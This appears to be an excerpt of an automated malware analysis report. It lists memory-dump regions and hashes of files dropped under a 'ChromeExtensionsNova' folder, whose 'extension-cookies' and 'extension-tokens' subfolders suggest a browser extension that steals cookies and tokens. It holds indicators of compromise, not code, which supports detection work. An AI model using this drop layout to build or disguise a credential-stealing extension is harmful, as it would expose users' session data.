SHA512 932f53b6cd2aa55ab1475d85528069357fa7d9eea26051d1a4edb11872ca30d02c31c44bed3a48f0ccdbebe556e9d8ec2f4a0815bf177d93ab4272b3fe2fb0b5

memory/1544-970-0x00007FFE0A630000-0x00007FFE0B0F1000-memory.dmp

memory/1544-971-0x000002067DE30000-0x000002067DE40000-memory.dmp

memory/1544-981-0x000002067DE30000-0x000002067DE40000-memory.dmp

memory/1544-983-0x00007FFE0A630000-0x00007FFE0B0F1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1228-988-0x00007FFE0A630000-0x00007FFE0B0F1000-memory.dmp

C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo.png

MD5 252b4fda07550496d330d819f15ceb3e
SHA1 650584312b310219a26d5fc20cb1804bb6c4dde5
SHA256 39eafade0656a3c0bd723ad576b1f00a0d625ebeef80ac01f965165ffc28cf1d
SHA512 a18529cc7325d3fce5fb5d32a63b74a8e2ff23a027c12fecdc111f14b1c601079512fce3ff5484a686aaa0dd1ea20083570707511541e4a6d7615053f3ffac49

C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo128.png

MD5 c555604e8b6f818991e186342f856b1b
SHA1 3ae02db8eba2f4fa30cb7567a9f5bf8346faded0
SHA256 012da30b247a7964a3bdaaaeec8a6fb5559d7047ab8f1bcc0a2a785aad978972
SHA512 01a6c8f91d1eedd0d83b654059844aa7ed16e76abfce54183b5bf484edb6cb33e0ebe317987a3143e94c23ef60954ced0e32378a1a5f80f8412c7029e4303bbe

C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo16.png

MD5 f0f11cd478cc44d518c16820ede9d253
SHA1 cfaf8d2e071f2ade0894578e5b44e02032d27be4
SHA256 321695dbcac7b2ceb14ef2651705ead5c0c42815358082b758ee803a37e945bb
SHA512 ac736abf8a776918df4094929efc29f7ae643aeef8d9b464653e3b7272a0799e58dc961dacadfbf9f42f575dfba14df7e6f4b1256c2c83dfe333ffb2ed3a1de8

C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo48.png

MD5 2f0a6a34d9b95bba0e3358ddd41ff2ac
SHA1 f39a9e7aeab9fe86fd9034284516de40186e6e93
SHA256 6f575f1cac9f29b8f1f8a83a580811bdedeec88f9d4cb78ccecb553cba251ca5
SHA512 a3c2094377b355a56d7d69f2a53baac58ebf3b40c5c031ba60fbc6f53e72e67e537e7bddee1489bbae4b41ea23311ad6b6f5c841e7b070dcdeca4bb8a6043084

C:\ProgramData\ChromeExtensionsNova\extension-cookies\manifest.json

MD5 04c23766134b234e85cc537b2162efb1
SHA1 45c48d9ca30a4580a682f025cc66331e49f6f158
SHA256 f50f62683347bbca52d7f7de0c877014ae77043753905628644e2d485dfb4900
SHA512 d246f59ad6d6e9fc8d8d88129302d55cb3d2ba7d52496915ee6791fa0576153070af76ea689cc74ccefc36456df749ac5c8f45cb12702961470f202078bfcb3c

C:\ProgramData\ChromeExtensionsNova\extension-tokens\js\jquery-3.5.1.min.js

MD5 9ac39dc31635a363e377eda0f6fbe03f
SHA1 29fa5ad995e9ec866ece1d3d0b698fc556580eee
SHA256 9a2723c21fb1b7dff0e2aa5dc6be24a9670220a17ae21f70fdbc602d1f8acd38
SHA512 0799ae01799707b444fca518c3af9b91fda40d0a2c114e84bc52bd1f756b5e0d60f6fd239f04bd4d5bc37b6cdbf02d299185cd62410f2a514a7b3bd4d60b49fc

C:\ProgramData\ChromeExtensionsNova\extension-tokens\manifest.json

MD5 42ac88deb5c3cfc02fdc1c27319ee067
SHA1 97b1addf35159800b90743fcfbb5505e80f6eb82
SHA256 28486361faff1827fb9f1871529c48efaaf86027592d189afa6f99b14eb3f4bb
SHA512 77c4054a3cf061eb6f4f6e9803b74833a8fb0fe352239b5b47cf39ea5eea8104b9da6deab75018557476fbda856f3be8d57e6fe2eb777c45a7a1bdb1e72d02d5